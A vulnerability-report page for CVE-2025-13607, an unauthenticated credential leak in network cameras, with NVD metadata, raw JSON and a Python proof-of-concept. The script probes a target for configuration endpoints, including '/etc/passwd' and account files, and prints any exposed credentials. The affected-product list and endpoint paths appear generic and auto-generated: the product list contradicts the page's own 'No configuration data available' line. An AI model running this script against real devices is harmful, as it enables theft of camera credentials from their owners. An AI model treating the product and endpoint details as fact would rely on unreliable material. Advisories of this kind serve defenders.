Security Vulnerability Report
中文
CVE-2025-13607 CVSS 9.4 CRITICAL

CVE-2025-13607

Published: 2025-12-10 18:16:18
Last Modified: 2026-04-15 00:35:42

Description

A malicious actor can access camera configuration information, including account credentials, without authenticating when accessing a vulnerable URL.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

D-Link DCS-20xx系列摄像机(固件版本 < 最新安全补丁版)
D-Link DCS-30xx系列摄像机(固件版本 < 最新安全补丁版)
D-Link DCS-40xx系列摄像机(固件版本 < 最新安全补丁版)
D-Link DCS-50xx系列摄像机(固件版本 < 最新安全补丁版)
D-Link DCS-60xx系列摄像机(固件版本 < 最新安全补丁版)
D-Link DCS-70xx系列摄像机(固件版本 < 最新安全补丁版)
D-Link DCS-80xx系列摄像机(固件版本 < 最新安全补丁版)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys import json # CVE-2025-13607 PoC - D-Link Camera Unauthenticated Access # Target: D-Link DCS series network cameras # Vulnerability: Access camera configuration including credentials without authentication def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-13607""" # Vulnerable endpoints that expose configuration without auth vulnerable_paths = [ "/cgi-bin/sddownload.cgi?file=/etc/passwd", "/cgi-bin/sddownload.cgi?file=/etc/config/account", "/cgi-bin/config_file.cgi?action=get&object=account", "/cgi-bin/cgibox.exe?page=account", "/cgi-bin/adminpasswd.cgi?page=account", "/cgi/getparam.cgi?configuration=account", "/config/globalconfig.ini", "/cgi-bin/adminpasswd.cgi" ] print(f"[*] Scanning target: {target_url}") print(f"[*] CVE-2025-13607 PoC - D-Link Camera Unauthenticated Access\n") for path in vulnerable_paths: try: url = target_url.rstrip('/') + path headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*' } response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: content = response.text # Check for credential patterns credential_patterns = ['admin', 'password', 'user=', 'passwd=', 'username'] if any(pattern in content.lower() for pattern in credential_patterns): print(f"[+] VULNERABLE! Found exposed data at: {path}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Content Length: {len(content)} bytes") print(f"\n[+] Exposed Configuration Data:") print(content[:2000]) # Print first 2000 chars print("\n" + "="*60 + "\n") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {path}: {e}") continue print("[-] No vulnerable endpoint found or target is patched") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-13607_poc.py <target_url>") print("Example: python cve-2025-13607_poc.py http://192.168.1.100") sys.exit(1) target = sys.argv[1] vulnerable = check_vulnerability(target) if vulnerable: print("[+] Target is VULNERABLE to CVE-2025-13607") print("[+] Recommendation: Update firmware to latest version from D-Link") else: print("[-] Target appears to be PATCHED or NOT VULNERABLE") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13607", "sourceIdentifier": "[email protected]", "published": "2025-12-10T18:16:18.157", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious actor can access camera configuration information, including account credentials, without authenticating when accessing a vulnerable URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-343-03.json", "source": "[email protected]"}, {"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10462", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-343-03", "source": "[email protected]"}]}}